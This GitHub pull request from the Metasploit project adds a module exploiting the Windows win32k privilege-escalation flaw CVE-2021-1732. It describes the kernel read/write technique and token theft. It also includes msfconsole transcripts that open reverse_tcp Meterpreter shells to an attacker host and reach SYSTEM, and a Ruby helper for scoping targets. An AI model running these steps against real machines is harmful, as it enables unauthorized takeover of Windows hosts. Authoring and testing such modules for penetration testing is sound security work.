
Add exploit for CVE-2021-1732 #14907


Merged (5 commits) Mar 18, 2021

Conversation

@zeroSteiner zeroSteiner commented Mar 16, 2021

This adds an exploit for CVE-2021-1732, which is a vulnerability in win32k. By calling NtUserConsoleControl in a callback function and passing the window that is currently being created, a field can be switched to an offset despite containing an attacker-controlled value. This is used to build read and write primitives to access kernel memory. Once built, the primitives are used to steal a SYSTEM token from PID 4.

In my testing the exploit is pretty reliable. When it doesn't work, it fails gracefully and does not cause a BSOD, though it is certainly theoretically possible that it could; I just haven't observed that behavior. I've tested this on all 6 affected versions of Windows 10 from 1803 through 20H2. I tested 1709 as well, but the exploit does not appear to work for that one despite it supposedly being vulnerable. Version 1709 is no longer in service and is thus not listed by MSRC as an affected system.

From a user's perspective the exploitation process is pretty straightforward; there are no special options. The entire thing takes place in memory. Like many RDLL exploits, a process is created to host the DLL, which is then elevated before the payload is executed. This logic is actually used in so many places that I moved it into a Mixin, since it's copied and pasted among quite a few exploits.

Verification


  • Start msfconsole
  • Open an x64 Windows Meterpreter session on a supported target (Windows 10 1803-20H2)
  • Run the check method, make sure it's reported as appears to be vulnerable
  • Run the exploit, get an elevated session back
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-JKM0HAD\aliddle
meterpreter > sysinfo
Computer        : DESKTOP-JKM0HAD
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2021_1732_win32k 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2021_1732_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2021_1732_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 7672 launched.
[*] Reflectively injecting the DLL into 7672...
[*] Sending stage (200262 bytes) to 192.168.159.66
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.66:60838) at 2021-03-15 17:56:28 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
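As an added example (not the module's own code, and not part of the PR), the scoping decision a practitioner makes before running the module can be scripted from a session's `sysinfo` output. The transcript shows the module's check keying on the Windows build number ("Windows Build Number = 17134" precedes the verdict), and the verification steps require an x64 Windows Meterpreter on Windows 10 1803 through 20H2; the build-to-release mapping below is the public one, and the `parse_sysinfo`/`check_target` names and the sample `sysinfo` text are constructed for this example.

```ruby
# Added example, not code from the Metasploit module: decide whether a
# Meterpreter target is in scope for exploit/windows/local/cve_2021_1732_win32k
# from its `sysinfo` output, the same way a user would eyeball it before `run`.

# Windows 10 release -> build number for the six releases the PR says were
# tested. Server 2019 shares build 17763 with 1809; the PR only reports
# testing Windows 10, so that case is flagged in the reason string.
AFFECTED_BUILDS = {
  17134 => '1803',
  17763 => '1809',
  18362 => '1903',
  18363 => '1909',
  19041 => '2004',
  19042 => '20H2',
}.freeze

# 1709 is supposedly vulnerable but the PR author reports the exploit does not
# work there, and it is out of service so MSRC does not list it.
UNSUPPORTED_BUILDS = { 16299 => '1709' }.freeze

SysInfo = Struct.new(:os, :build, :arch, :meterpreter)

# Parse the "key : value" lines of a `sysinfo` dump. `build` is nil when the
# OS line carries no "Build NNNNN" token (e.g. a non-Windows session).
def parse_sysinfo(text)
  fields = {}
  text.each_line do |line|
    next unless line.include?(':')
    key, _, value = line.partition(':')
    fields[key.strip] = value.strip
  end
  os = fields['OS'].to_s
  build = os[/Build (\d+)/, 1]&.to_i
  SysInfo.new(os, build, fields['Architecture'], fields['Meterpreter'])
end

# Returns [status, reason]. Statuses: :appears (in the tested range),
# :not_supported (wrong Meterpreter arch or 1709), :unknown (anything else;
# deliberately not "safe", since untested is not the same as unaffected).
def check_target(info)
  return [:unknown, 'no Windows build number in sysinfo'] if info.build.nil?
  unless info.meterpreter == 'x64/windows'
    return [:not_supported,
            "module needs an x64 Windows Meterpreter, got #{info.meterpreter.inspect}"]
  end
  if (rel = AFFECTED_BUILDS[info.build])
    note = info.build == 17763 ? ' (or Server 2019, which the PR did not test)' : ''
    [:appears, "Windows 10 #{rel}#{note}, build #{info.build}, is in the tested range 1803-20H2"]
  elsif (rel = UNSUPPORTED_BUILDS[info.build])
    [:not_supported, "Windows 10 #{rel} (build #{info.build}) is out of service and the exploit did not work there"]
  else
    [:unknown, "build #{info.build} is outside the tested range 17134-19042"]
  end
end

# Constructed sample, modelled on the sysinfo output in the PR transcript.
SAMPLE_SYSINFO = <<~TXT
  Computer        : DESKTOP-JKM0HAD
  OS              : Windows 10 (10.0 Build 19042).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
TXT

if __FILE__ == $PROGRAM_NAME
  status, reason = check_target(parse_sysinfo(SAMPLE_SYSINFO))
  puts "#{status}: #{reason}"
end
```

The status is a scoping hint only; the module's own `check` (run automatically unless AutoCheck is disabled) remains the authoritative verdict, and as the later comments in this thread show, "appears to be vulnerable" does not guarantee a successful run on the first attempt.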

@bwatters-r7 bwatters-r7 self-assigned this Mar 17, 2021
@bwatters-r7

Disregard the handler bind and module failures; I already had a listener running.

msf6 exploit(windows/local/cve_2021_1732_win32k) > run

[-] Handler failed to bind to 192.168.135.197:4567:-  -
[-] Handler failed to bind to 0.0.0.0:4567:-  -
[*] Executing automatic check (disable AutoCheck to override)
[*] Windows Build Number = 17134
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 8728 launched.
[*] Reflectively injecting the DLL into 8728...
[*] Sending stage (200262 bytes) to 192.168.132.125
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.135.197:4567 -> 192.168.132.125:49680) at 2021-03-18 14:06:26 -0500

[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2021_1732_win32k) > 
msf6 exploit(windows/local/cve_2021_1732_win32k) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > uid
[-] Unknown command: uid.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@bwatters-r7 bwatters-r7 merged commit 2c1869f into rapid7:master Mar 18, 2021

bwatters-r7 commented Mar 18, 2021

Release Notes

New module exploits/windows/local/cve_2021_1732_win32k achieves privilege escalation on vulnerable win32k targets via CVE-2021-1732.


timwr commented Mar 18, 2021

Is this 100% reliable for you guys? It seems about 30% reliable for me on Windows 10 (10.0 Build 18363).

@bwatters-r7

I tried it about 6-7 times, and it only failed once? In that one case, I was able to just run it again, and it worked.
I'm using the VM from above, so Windows 10x64 Release 1803.


timwr commented Mar 18, 2021

Since it's really quick and doesn't seem to BSOD (or have any side effects), I was tempted to wrap the exploit in a for loop (so it tries multiple times until succeeding), but manually re-running probably makes more sense. Nice work btw!

@zeroSteiner

Yeah it wasn't exactly 100% reliable for me either but my thought was that it was "good enough" for GoodRanking, especially since the behavior I saw was like what Brendan described and that it did not trigger a BSOD on the remote system.

@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 26, 2021

@zeroSteiner zeroSteiner deleted the feat/cve-2021-1732 branch May 25, 2021 19:05